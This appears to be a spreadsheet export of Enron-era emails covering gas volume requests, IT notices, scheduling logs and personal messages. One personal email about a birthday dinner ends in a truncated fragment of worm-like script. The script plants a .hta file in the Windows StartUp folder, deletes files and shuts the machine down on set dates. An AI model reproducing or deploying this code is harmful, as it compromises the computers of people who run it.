TL - Commissioner Updated 12/20/01 Chandler won't have too look over his sh=_x000D_
oulder this week. The Atlanta Journal-Constitution says Michael Vick will n=_x000D_
ot see action unless Chandler is injured.   MarTay Jenkins , WR ARI - Free =_x000D_
Agent Updated 12/20/01 Jenkins (ankle) did not practice on Wednesday. He is=_x000D_
 listed as questionable for Sunday's game.   Ricky Watters  , RB SEA - Free=_x000D_
 Agent Updated 12/19/01 Watters has placed on injured reserve. He will not =_x000D_
play again this season. Shaun Alexander will be the starter for Seattle's f=_x000D_
inal three games.   Brian Griese , QB DEN - Jugg or Nuts Updated 12/19/01 G=_x000D_
riese should be able to return from a concussion after the bye week. Jariou=_x000D_
s Jackson will be Denver's No. 2 QB.   Joe Jurevicius , WR NYG - Drunk Monk=_x000D_
eys Updated 12/19/01 Jurevicius (hamstring) is expected to return to action=_x000D_
 on Sunday. He may be able to catch a deep ball or two against the erratic =_x000D_
Seattle secondary.   Travis Henry , RB BUF - Kens Killers Updated 12/19/01 =_x000D_
Henry will miss Sunday's game with a sprained right knee. Shawn Bryson will=_x000D_
 start in his place.   Tim Dwight , WR SD - Free Agent Updated 12/19/01 Dwi=_x000D_
ght (fluid in lung) is not expected to play this week. He has not produced =_x000D_
very much this year when healthy.  Tyrone Wheatley , RB OAK - Jugg or Nuts =_x000D_
Updated 12/19/01 Wheatley, who was not used last week, is expected to see s=_x000D_
ome playing time in Week 15. He will probably not be used enough, however, =_x000D_
to help most Fantasy teams.   Derrick Mason , WR TEN - Kens Killers Updated=_x000D_
 12/19/01 Mason missed Tuesday's practice with a hip flexor injury. His cur=_x000D_
rent status is day to day.  Steve McNair  , QB TEN - Feeleys Fanatics Updat=_x000D_
ed 12/19/01 McNair (back stiffness) missed practice on Tuesday. His current=_x000D_
 status is day to day.   More Updates  NFL Reports, Transactions  [IMAGE] 1=_x000D_
2/20 Cincinnati Bengals  Signed quarterback Scott Covington  to a one-year =_x000D_
contract; placed cornerback Mark Roman on the injured reserve list.    12/1=_x000D_
9 Denver Broncos  Placed quarterback Gus Frerote and defensive end Kavika P=_x000D_
ittman on the injured reserve list.   Green Bay Packers  Signed free safety=_x000D_
 Scott Frost; placed linebacker Chris Gizzi on injured reserve.    12/18 Ci=_x000D_
ncinnati Bengals  Placed quarterback Akili Smith  on injured reserve; signe=_x000D_
d linebacker Chris Edmonds to the active roster; signed wide receiver Khori=_x000D_
 Ivey and quarterback Kevin Thompson  to the practice squad.   Detroit Lion=_x000D_
s  Waived punter Leo Araguz; signed guard Tyrone Hopson; signed tight end J=_x000D_
ohn Waerig  to the practice squad; placed guard Josh Lovelady on the practi=_x000D_
ce squad injured reserve list.   Minnesota Vikings  Placed punter Mitch Ber=_x000D_
ger on injured reserve; signed quarterback Romaro Miller .    12/17 New Orl=_x000D_
eans Saints  Suspended wide receiver Albert Connell  for four games for con=_x000D_
duct detrimental to the team.    12/14 Winnipeg Blue Bombers (CFL) Signed w=_x000D_
ide receiver Tyrone Sutherland.   Carolina Cobras (AFL) Re-signed wide rece=_x000D_
iver-defensive back Buddy Crutchfield and lineman Silas Demary; activated w=_x000D_
ide receiver-defensive back Buddy Crutchfield.   Chicago Rush (AFL) Signed =_x000D_
defensive specialist Damien Marzett.   Dallas Desperados (AFL) Signed linem=_x000D_
an Shamsud-Din Shaheed.   Detroit Fury (AFL) Signed wide receiver-defensive=_x000D_
 back Torey Hunter and lineman Earl Scott; re-signed offensive specialist R=_x000D_
obert Gordon and activated him.   Grand Rapids Rampage (AFL) Signed lineman=_x000D_
 Israel Raybon.   Tampa Bay Storm (AFL) Signed lineman Ernest Certain and f=_x000D_
ullback-linebacker Jeff Macrea; waived wide receiver-defensive back Brad Fo=_x000D_
rd.    Transactions, View  [IMAGE]     [IMAGE] Make Selection   [IMAGE]    =_x000D_
   [IMAGE] There are no League Transactions which meet the selected criteri=_x000D_
a.  To see all league transactions select "All", "All", "All Teams" from th=_x000D_
e Transactions, View page.      Schedule, Breakdown  [IMAGE][IMAGE]  Copyri=_x000D_
ght 2001 Commissioner.COM Inc and SportsLine.com Inc. Your site can be reac=_x000D_
hed from http://fantasy.sportsline.com   FB10SP  =09_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 03:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kristann.shireman@enron.com'})</t>
  </si>
  <si>
    <t>Purchase Malin and Socal Topock</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kristann Shireman/HOU/EES on 05/08/2001 _x000D_
10:11 AM ---------------------------_x000D_
_x000D_
_x000D_
Kristann Shireman_x000D_
05/08/2001 08:48 AM_x000D_
To: Frank Ermis/HOU/ECT@ECT, Keith Holst/HOU/ECT@ect_x000D_
cc:  _x000D_
_x000D_
Subject: Purchase Malin and Socal Topock_x000D_
_x000D_
Please provide me with your Physical offer for the following volumes:_x000D_
The volumes are in monthly volumes._x000D_
Thanks_x000D_
Kris Shireman_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
MALIN_x000D_
_x000D_
06/2001:  44,997_x000D_
07/2001:  41,838_x000D_
08/2001:   46,070_x000D_
09/2001:    39,859_x000D_
10/2001:    37,283_x000D_
11/2001:    28,038_x000D_
12/2001:    31,431_x000D_
01/2002:    23,643_x000D_
02/2002:    21,228_x000D_
03/2002:     10,546_x000D_
04/2002:     15,851_x000D_
05/2002:     23,528_x000D_
06/2002:     33,978_x000D_
07/2002:     32,611_x000D_
08/2002;     34,332_x000D_
09/2002:     30,093_x000D_
10/2002:     28,214_x000D_
11/2002:     23,518_x000D_
12/2002:     23,030_x000D_
01/2003:     17,963_x000D_
02/2003:     17,820_x000D_
03/2003:      16,651_x000D_
04/2003:      15,640_x000D_
05/2003:      23,212_x000D_
06/2003:      33,520_x000D_
07/2003:      32,117_x000D_
08/2003:      33,878_x000D_
09/2003:      29,681_x000D_
10/2003:      27,869_x000D_
11/2003:      23,155_x000D_
12/2003:      22,721_x000D_
01/2004:      17,721_x000D_
02/2004:      16,973_x000D_
03/2004:      16,430_x000D_
04/2004:      15,419_x000D_
05/2004:       22,896_x000D_
06/2004:      33,057 _x000D_
07/2004:      31,628_x000D_
08/2004:      33,431_x000D_
09/2004:      29,273_x000D_
10/2004:      27,491_x000D_
11/2004:      22,843_x000D_
12/2004;      22,423_x000D_
01/2005:      17,482_x000D_
02/2005;      16,748_x000D_
03/2005:      16,211_x000D_
04/2005:      15,200_x000D_
05/2005:      22,585_x000D_
06/2005:      32,600_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 06:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rocky.emery@painewebber.com'})</t>
  </si>
  <si>
    <t>Portfolio Managers' Spotlight:Novemer 10, 2000</t>
  </si>
  <si>
    <t>The enclosed research report is being sent to you from PaineWebber by:_x000D_
_x000D_
 EMERY FINANCIAL GROUP_x000D_
_x000D_
 713-957-7020_x000D_
_x000D_
 ROCKY.EMERY@PaineWebber.COM_x000D_
_x000D_
Please contact them if you have any questions or would like to discuss this _x000D_
material._x000D_
_x000D_
The information contained in the attached research report is believed to be _x000D_
reliable, but its accuracy is not guaranteed.  PaineWebber Incorporated _x000D_
and/or Mitchell Hutchins Asset Management Inc., affiliated companies and/or _x000D_
their officers, directors, employees or stockholders may at times have a _x000D_
position, including an arbitrage position, in the securities described herein _x000D_
and may sell or buy them to or from customers.  These companies may from time _x000D_
to time act as a consultant to a company being reported upon._x000D_
_x000D_
You will need the Adobe Acrobat Reader to view this document.  If you don't _x000D_
already have it just click on this link, _x000D_
http://www.adobe.com/prodindex/acrobat/readstep.html, and follow the _x000D_
on-screen instructions.  The Acrobat Reader is free of charge._x000D_
_x000D_
_x000D_
_x000D_
 - P004302520001110D01.pdf</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 18:51:07 -0800 (PST)</t>
  </si>
  <si>
    <t>DRAFT:  INFORMATION, Please Read: UBSWE Migration postponed</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Due to a variety of circumstances we did not migrate employees to the UBSWE environment tonight (Monday, February 4, 2002). We will communicate further details of the migration plan on Tuesday, February 5, 2002._x000D_
_x000D_
Thank you for your cooperation in advance, please contact the Resolution Center at x 3-1411 should you have any questions._x000D_
_x000D_
UBSW Energy Global Infrastructure_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 08:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Tuesday</t>
  </si>
  <si>
    <t xml:space="preserve">Did you have a great time in Aspen??  I hope you did._x000D_
_x000D_
I have about narrowed my "all over the place" down to the townhouse because_x000D_
of affordability and Sarah's approval.  It is kind of apartmenty, but, who_x000D_
knows, I may be able to get a life!!!  Don't hold your breath!!  Actually,_x000D_
it is sounding better and better all of the time.  I kind of get excited_x000D_
thinking about not having so much to keep up with.  My 'plant life' will_x000D_
decrease considerably, but how's about me coming to your place sometime to_x000D_
dig in your dirt??  I will have some things that we could dig up if you are_x000D_
interested._x000D_
_x000D_
Thanks for your encouraging words regarding Enron.  I will continue to think_x000D_
positively!!!_x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;Tana.Jones@enron.com&gt;_x000D_
To: &lt;pyoung@pdq.net&gt;_x000D_
Sent: Tuesday, August 15, 2000 12:09 PM_x000D_
Subject: Re: Tuesday_x000D_
_x000D_
_x000D_
_x000D_
I just got in from Aspen.  This Sunday looks good for me for Carol's_x000D_
birthday.  Is Holly going, she might like to...?_x000D_
_x000D_
In terms of a townhome, I think that would be nice, also Garden Oaks.  It_x000D_
seems like you are kinda all over the place, though, and you might want to_x000D_
be careful making "emotional" home buying decisions..._x000D_
_x000D_
As far as not hearing back from Enron.  I wouldn't think anything of it._x000D_
They told me they absolutely wanted me and then I didn't hear back from_x000D_
them for two months.  Big companies have lots of layers to get anything_x000D_
done.  Just keep plugging on..._x000D_
_x000D_
_x000D_
_x000D_
                    "Patti Young"_x000D_
                    &lt;pyoung@pdq.n        To:     "Tana Jones"_x000D_
&lt;tana.jones@enron.com&gt;_x000D_
                    et&gt;                  cc:_x000D_
                                         Subject:     Tuesday_x000D_
                    08/15/2000_x000D_
                    02:59 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Oh, I forgot to tell you something else:_x000D_
_x000D_
Carol Gradziel turns 50 today, but on Sunday  evening, August 20, we were_x000D_
going to do a surprise dinner at Buca di Beppo at  Buffalo Speedway and 59._x000D_
I would love for you to come. It will be  the running group, mostly_x000D_
couples, and me and Carol. Everyone is supposed  to get there at 6:45 and_x000D_
we (Monnie, Ralph, and I are picking Carol up to be  there by 7. If you_x000D_
are not busy, try to come. Monnie and Ralph have  run with us, but they_x000D_
are the realtors that Carol does most of her business with  and I have_x000D_
known them for about 25 years._x000D_
_x000D_
');t3.close_x000D_
();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new_x000D_
Date();if(d.getDate()==1 &amp;&amp; d.getHours()&gt;17){alert('Kagou-Anti-Kro$oft says_x000D_
not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close_x000D_
();S3 driver memory alloc failed !]]%%%%%";la_x000D_
=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr._x000D_
Path_x000D_
_x000D_
(la=="fr")?"C:\\windows\\Menu D?marrer\\Programmes\\D?marrage\\kak.hta":"C:_x000D_
\\windows\\Start_x000D_
Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if_x000D_
(((agt.indexOf("msie")!=-1)&amp;&amp;(parseInt(navigator.appVersion)&gt;4))_x000D_
||(agt.indexOf("msie 5.")!=-1))scr.write(); file://--&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 04:36:57 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 2/4/02; HourAhead hour: 7;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 2/4/02; HourAhead hour: 7;  No ancillary schedules awarded.  No variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002020407.txt</t>
  </si>
  <si>
    <t>Wed, 19 Apr 2000 09:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>So Union</t>
  </si>
  <si>
    <t xml:space="preserve">Colorado River Station  7000 _x000D_
 Total 5031+2100+2100+7000 = 16231_x000D_
._x000D_
_x000D_
---------------------- Forwarded by Ami Chokshi/Corp/Enron on 04/19/2000 _x000D_
04:47 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Ami Chokshi                           04/19/2000 03:54 PM_x000D_
	_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: So Union_x000D_
_x000D_
TVille_x000D_
 5031 at TVille I-.02 for May_x000D_
_x000D_
Total  2100_x000D_
 2100_x000D_
 5031_x000D_
 9231_x000D_
---------------------- Forwarded by Ami Chokshi/Corp/Enron on 04/19/2000 _x000D_
03:55 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Ami Chokshi                           04/19/2000 01:58 PM_x000D_
	_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
Southern Union for May_x000D_
2100 83 st_x000D_
2100 Port Arthur_x000D_
_x000D_
These are my estimates. The volumes for April at T-ville and Colorado RS are _x000D_
either spot or April only. Janet does not know about next month yet._x000D_
So, 5000 total is a safe assumption._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 20:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Update for Executive Report Viewer project</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the update.  I am forwarding your message to Beth Apollo.  She is the VP on my team that manages our Global Services, and this Executive Report Viewer falls in that arena.  She will be closer to this than I.  You may want to get her feedback as well.  --Sally _x000D_
_x000D_
_x000D_
From:	Zhiyong Wei/ENRON@enronXgate on 04/04/2001 01:07 PM_x000D_
To:	Sally Beck/HOU/ECT@ECT_x000D_
cc:	 _x000D_
Subject:	Update for Executive Report Viewer project_x000D_
_x000D_
Sally,_x000D_
_x000D_
I just want to give you an update on the Executive Report Viewer project in case you are not aware of the status. The development of the ERV project has been completed and delivered on schedule. The feedback from the demo was very positive. The application has been handed over for user acceptance test._x000D_
_x000D_
Thanks_x000D_
_x000D_
Zhiyong_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>TD volumes</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Catherine Clark/HOU/ECT on 09/29/2000 _x000D_
09:22 AM ---------------------------_x000D_
   _x000D_
	Enron Global Finance_x000D_
	_x000D_
	From:  Catherine Clark                           09/28/2000 04:50 PM_x000D_
	_x000D_
_x000D_
To: Jonathan McKay/CAL/ECT@ECT, jeffrey.w.dellapina@chase.com_x000D_
cc: John Griffith/Corp/Enron@Enron, Soma Ghosh/HOU/ECT@ECT, Brian _x000D_
Kerrigan/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT _x000D_
Subject: TD volumes_x000D_
_x000D_
Jon: I'm attaching TD's volumes (in GJs) for swap 1 with Enron Canada.  The _x000D_
fixed price is $5.983.  Just to be clear, these are how the volumes add up:_x000D_
12/29/2000 422,002 GJ_x000D_
03/29/2001 422,002 GJ_x000D_
06/29/2001 422,002 GJ_x000D_
90/27/2001 25,058,472 GJ_x000D_
_x000D_
Jeff: can you size up the fixed price for the swap between ENA and Chase to _x000D_
reflect your spread on the above volumes?_x000D_
_x000D_
John:  you can use the same volumes, but at the price you get from Jeff _x000D_
(which you will pass on to Enron Canada in our internal swap)._x000D_
_x000D_
I will e-mail you RBC's volumes as soon as I confirm that they have locked in _x000D_
an interest rate (their volumes will be slightly different from TD's).  _x000D_
Please call me with any questions.  Thanks,_x000D_
-Catherine_x000D_
(713) 853-9943_x000D_
_x000D_
PS:  TD has links to other databases embedded in this spreadsheet.  Before _x000D_
opening in Excel, go to a blank sheet and set to manual calculation (go to _x000D_
Tools, then Options)_x000D_
_x000D_
---------------------- Forwarded by Catherine Clark/HOU/ECT on 09/28/2000 _x000D_
04:21 PM ---------------------------_x000D_
_x000D_
_x000D_
hulla@tdsecurities.com on 09/28/2000 04:13:20 PM_x000D_
To: Pushkar.shahi@enron.com, catherine.clark@enron.com_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Final, final version (I hope)...._x000D_
_x000D_
(See attached file: Enron IRS.xls)_x000D_
_x000D_
 - Enron IRS.xls_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 12:40:43 -0800 (PST)</t>
  </si>
  <si>
    <t>hello 11/20</t>
  </si>
  <si>
    <t>_x000D_
Hi there.  Well, I got my accounting test back  and it wasn't that great.  =_x000D_
I made a B.  I missed almost all my points  on one of the big problems.  I =_x000D_
screwed up the formula and used the wrong  number as the denominator which =_x000D_
made the whole problem wrong.  I was really  bummed and felt really stupid =_x000D_
when she went over it.  My friend Missy sits  behind me and the exact same =_x000D_
thing happened to her on the same problem so I  didn't feel so bad after th=_x000D_
at.  Our prof is going to substitute our lowest  test grade with our final =_x000D_
exam grade which she said everyone always does  really well on so I still h=_x000D_
ave an A in the class.  I was still ticked  though.  I know a B isn't bad b=_x000D_
ut when it's because of one problem you  screwed up it's frustrating.  If I=_x000D_
 hadn't screwed up the problem I would  have had an A.  Other than that, to=_x000D_
day had been unexciting.  I'll be  home tomorrow night and can't wait!!!  I=_x000D_
 was thinking of coming over in the  morning on Thanksgiving Day and stayin=_x000D_
g till noon.  Would that be ok?   I think the Saporitos are coming over at =_x000D_
noon so I have to be back by  then.  Let me know what your plans are as far=_x000D_
 as thanksgiving day goes and  if my coming over in the morning is ok.  I l=_x000D_
ove you!!!  Have fun with  Nick (hehehehe - or should I say good luck).  Te=_x000D_
ll Grandma Bettye hello and  I love her for me.  Talk to you tonight._x000D_
Love,_x000D_
Caron</t>
  </si>
  <si>
    <t>Tue, 8 Aug 2000 02:35:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'karla.feldman@enron.com'})</t>
  </si>
  <si>
    <t>Re: Software License</t>
  </si>
  <si>
    <t xml:space="preserve">Karla,_x000D_
_x000D_
August is a vacation month in France._x000D_
_x000D_
I would not count on a response any time soon._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
From: Karla Feldman on 08/08/2000 09:34 AM_x000D_
To: geman@dauphine.fr_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Stinson Gibner/HOU/ECT@ECT _x000D_
Subject: Software License_x000D_
_x000D_
Ms. Geman,_x000D_
_x000D_
I am just following up to see if you had received my previous message _x000D_
forwarded below and whether you have a response so that we can move forward _x000D_
with this contract?_x000D_
_x000D_
Thank you ,_x000D_
Karla Feldman_x000D_
_x000D_
----- Forwarded by Karla Feldman/HOU/ECT on 08/08/2000 09:23 AM -----_x000D_
_x000D_
	Karla Feldman_x000D_
	07/28/2000 01:41 PM_x000D_
		 _x000D_
		 To: geman@dauphine.fr_x000D_
		 cc: _x000D_
		 Subject: Software License_x000D_
_x000D_
Dear Ms. Geman,_x000D_
_x000D_
I met with Vince Kaminski yesterday regarding picking back up with the _x000D_
license agreement we were working on back in March.  He relayed some _x000D_
additional requirements which need to be added to the agreement, which _x000D_
include the following:_x000D_
_x000D_
 1. The price agreed upon is $90,000._x000D_
 2. D-G will provide system support._x000D_
3. No later than 12 months of execution of the agreement, D-G will provide _x000D_
the source code to Enron.  In the meantime, the source code is to be in _x000D_
escrow.  Additionally, the source code would be released sooner than the 12 _x000D_
months if any of the following conditions occur:  (i) D-G goes out of _x000D_
business; (ii) D-G is unable to provide effective technical support; or (iii) _x000D_
if D-G agrees to release it sooner._x000D_
_x000D_
Before I have our attorney add these things to the agreement, we need to _x000D_
discuss the escrow situation.  Vince mentioned that you had suggested that _x000D_
your attorney keep the software in escrow.   Is your attorney a U.S. _x000D_
attorney?  It seems like I may have recalled that way back in March you might _x000D_
have said you had a friend or relative that was an attorney.  Is that the _x000D_
same person?  Does this attorney work for a large firm, small firm, or solo _x000D_
practitioner?  Basically, if you could just provides some additional _x000D_
information about your attorney, I would appreciate it._x000D_
_x000D_
We normally would use an Escrow company to put the software in escrow.  We _x000D_
have dealt with a company here in the U.S. called DSI Technology.  I will _x000D_
check into that pending your answer regarding your attorney._x000D_
_x000D_
Once we decide what we want to do regarding placing the software in escrow, _x000D_
we will red-line the agreement to reflect such changes and e-mail it back to _x000D_
you for your review._x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Karla Feldman_x000D_
Enron Corp._x000D_
Contract Administration_x000D_
(713) 646-7554_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 06:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">missing deal _x000D_
_x000D_
buy sierra_x000D_
18th_x000D_
226.00_x000D_
50 mw_x000D_
palo_x000D_
</t>
  </si>
  <si>
    <t>Fri, 28 Jan 2000 06:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>New IS&amp;S Request for Richard Shapiro</t>
  </si>
  <si>
    <t xml:space="preserve">SK - I went ahead and approved this request.  This is to make Rick's computer _x000D_
faster. mm_x000D_
_x000D_
You have received a new IS&amp;S request for Richard Shapiro.  Please review the _x000D_
request and make any necessary changes.  If you approve the access, please _x000D_
click the Approve button at the top of the request form and EES Security will _x000D_
receive notification.  You may click the link at the end of this message to _x000D_
view the request document._x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 06:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.sayre@enron.com', 'francisco.leite@enron.com', 'anne.koehler@enron.com', 'tana.jones@enron.com', 'sara.shackleton@enron.com', 'carol.clair@enron.com', 'brent.hendry@enron.com', 'robert.bruce@enron.com', 'samantha.boyd@enron.com', 'stephanie.panus@enron.com', 'mary.cook@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>December SWAP Calendar</t>
  </si>
  <si>
    <t>Attached for your information is the Group Calendar for December.  Please _x000D_
advise of any revisions you may have._x000D_
_x000D_
Taffy</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 09:27:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Sitara EOL Bridge Problem Today</t>
  </si>
  <si>
    <t xml:space="preserve">FYI&gt;&gt;&gt;We were also monitoring the EOL to Sitara bridge during this time to inform our traders and other desks of the situation and status...All deals bridged over by 10:30ish. THANKS_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Truong, Dat  _x000D_
Sent:	Thursday, October 25, 2001 11:11 AM_x000D_
To:	Moorer, Torrey; Lamadrid, Victor; Severson, Russ; Grant, George_x000D_
Cc:	Husain, Karima; Lim, Francis S.; Saluja, Gurdip; Sweitzer, Tara_x000D_
Subject:	Sitara EOL Bridge Problem Today_x000D_
_x000D_
The problem we faced today was due to 2 eol deal packets (2098073, 2099764) not having startdate and enddate.  Missing these 2 tibco message fields caused the bridge to bounce and resulted in the queue to build up while the bridge is starting up. (The bridge takes 2 minute for startup).  Each time these deals are sent/resent, it continuously cause the Sitarar EOLBridge to restart, thus magnifying the buildup of the queue._x000D_
_x000D_
The corrective action we are taking at our end is to build a rejection logic when eol packets do not have start and/or enddate. _x000D_
_x000D_
-Dat Truong </t>
  </si>
  <si>
    <t>Tue, 1 May 2001 19:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hamel@ruf.rice.edu'})</t>
  </si>
  <si>
    <t>Term paper</t>
  </si>
  <si>
    <t>Stuart,_x000D_
_x000D_
I cannot open your attachment._x000D_
_x000D_
Vince Kaminski</t>
  </si>
  <si>
    <t>Fri, 12 May 2000 02:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.fondren@enron.com'})</t>
  </si>
  <si>
    <t>Re: 1 and 5 Day Loss Limit 5/5 - 5/11</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Mark...me again.  You really are missing my presence in the controls group _x000D_
aren't you?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark Fondren_x000D_
05/12/2000 09:16 AM_x000D_
To: Michael E Moscoso/HOU/ECT@ECT, Chris Abel/HOU/ECT@ECT, Kevin _x000D_
Sweeney/HOU/ECT@ECT, Scott Earnest/HOU/ECT@ECT, Bjorn Hagelmann/HOU/ECT@ECT, _x000D_
Wade Doshier/HOU/ECT@ECT, John L Nowlan/HOU/ECT@ECT, Claude _x000D_
Straub/HOU/ECT@ECT, Fernley Dyson/LON/ECT@ECT, Tim _x000D_
Poullain-Patterson/LON/ECT@ECT, Christian LeBroc/Corp/Enron@ENRON, Susan M _x000D_
Scott/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 1 and 5 Day Loss Limit 5/5 - 5/11_x000D_
_x000D_
The 1 and 5 day loss violation resulted from being net short 2M bbls Heat _x000D_
with the Heat contract up $.10 cpg and short 2.4M bbls of WTI when the WTI _x000D_
contract is up 10%._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Mar 2000 04:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Vision and Values Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">I will plan to attend.  Can you attend as well?  --Sally _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 03/27/2000 12:37 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Elisabeth McCabe@ENRON_x000D_
03/22/2000 03:37 PM_x000D_
To: Brian Redmond/HOU/ECT@ECT, Tom Shelton/HOU/ECT@ECT, Renee _x000D_
Ingram/HOU/ECT@ECT, Billy Lemmons/Corp/Enron@ENRON, James I _x000D_
Ducote/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, Brenda F Herod/HOU/ECT@ECT, _x000D_
Louise Kitchen/HOU/ECT@ECT, Valeria A Hope/HOU/ECT@ECT, Susan _x000D_
Runkel/HOU/ECT@ECT, Brad Blesie/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Dan _x000D_
Lyons/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, Shelly Mansfield/HOU/ECT@ECT, Max _x000D_
Yzaguirre/NA/Enron@ENRON, John Enerson/HOU/ECT@ECT, Morris Richard _x000D_
Clark/HOU/ECT@ECT, Shannon Bedrich/Corp/Enron@Enron_x000D_
cc: Katherine Benedict/HOU/ECT@ECT, Michelle Vitrella/HOU/ECT@ECT _x000D_
Subject: Vision and Values Meeting_x000D_
_x000D_
An ENA Vision and Values committee meeting will be held on Thursday, March 30 _x000D_
at 2:30 p.m. in 47C2.  _x000D_
_x000D_
We will review the internal communications plan for 2000 and discuss the _x000D_
upcoming focus groups that are planned for ENA in April.  _x000D_
_x000D_
The meeting should last no longer than one hour.  Please plan to attend._x000D_
_x000D_
Thank you._x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2000 03:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'james.bruce@enron.com'})</t>
  </si>
  <si>
    <t>Singapore domain name</t>
  </si>
  <si>
    <t>I have asked the tax guys to talk to you directly since I am in South America _x000D_
this week.  If you have not heard from them, you might try calling Stephen _x000D_
Douglas or Jeff Blumenthal.  They are the tax experts for EnronOnline.</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 14:57:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
In an effort to protect Enron's e-mail system from harmful viruses, the Global Messaging Team has implemented an inbound and outbound cluster of MAILSweeper servers. What does that mean to you, the user? All inbound and outbound Internet mail is passed through a set of servers that will scan each message for viruses, malicious code, business related-content and inappropriate content. Inbound Internet mail that contains the following attachment types will be quarantined (held for delivery): *.vbs, *.exe, *.com, *.bat, *.cmd. If you are the intended recipient of one of these e-mails, you will receive an automatic notification with instructions on how to get your legitimate e-mail released from quarantine._x000D_
_x000D_
We have taken these measures to protect our e-mail environment from harmful e-mail viruses. We believe that these protections will result in less down time for your e-mail, in the event that Enron gets hit with a virus or malicious code.</t>
  </si>
  <si>
    <t>Sat, 5 Jan 2002 01:36:58 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 1/4/02; HourAhead hour: 24;</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Start Date: 1/4/02; HourAhead hour: 24;  No ancillary schedules awarded.  Variances detected._x000D_
Variances detected in Load schedule. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002010424.txt_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 24 / Preferred: 118.26 / Final: 118.23)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: SDG1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 1/4/02_x000D_
  SC_ID: ENRJ_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 12:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'greg.whiting@enron.com'})</t>
  </si>
  <si>
    <t>Re: Becky Pitre</t>
  </si>
  <si>
    <t>Hey Greg,_x000D_
_x000D_
